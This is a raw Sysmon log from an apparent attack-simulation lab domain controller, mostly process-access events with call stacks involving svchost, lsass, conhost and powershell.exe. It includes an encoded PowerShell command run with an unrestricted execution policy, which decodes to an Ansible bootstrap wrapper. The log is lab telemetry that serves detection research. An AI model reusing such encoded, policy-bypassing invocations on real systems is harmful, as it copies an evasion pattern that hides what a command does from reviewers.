13:54:39.615{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004333Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.615{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004332Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.615{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004331Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.615{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004330Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.615{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-859F-5FCF-D700-000000009101}5096C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004329Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.615{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004328Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.615{10ACEC4A-859F-5FCF-D600-000000009101}46244908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-859F-5FCF-D700-000000009101}5096C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66db258b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662553c1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66247346(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253879(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6625346c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66239cc7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66239297(wow64) 154100x80000000000000004327Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.628{10ACEC4A-859F-5FCF-D700-000000009101}5096C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-859F-5FCF-CB41-080000000000}0x841cb0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{10ACEC4A-859F-5FCF-D600-000000009101}4624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000004326Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.615{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004325Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.615{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004324Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.599{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004323Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.568{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-859F-5FCF-D600-000000009101}4624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004322Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.568{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-859F-5FCF-D600-000000009101}4624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004321Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.521{10ACEC4A-859F-5FCF-D600-000000009101}4624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_a1ro0rri.vtt.ps12020-12-08 13:54:39.521 10341000x80000000000000004320Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.506{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-859F-5FCF-D600-000000009101}4624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004319Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.490{10ACEC4A-859F-5FCF-D300-000000009101}50044516C:\Windows\system32\conhost.exe{10ACEC4A-859F-5FCF-D600-000000009101}4624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004318Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.490{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004317Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.490{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004316Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.490{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004315Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.490{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004314Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.490{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004313Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 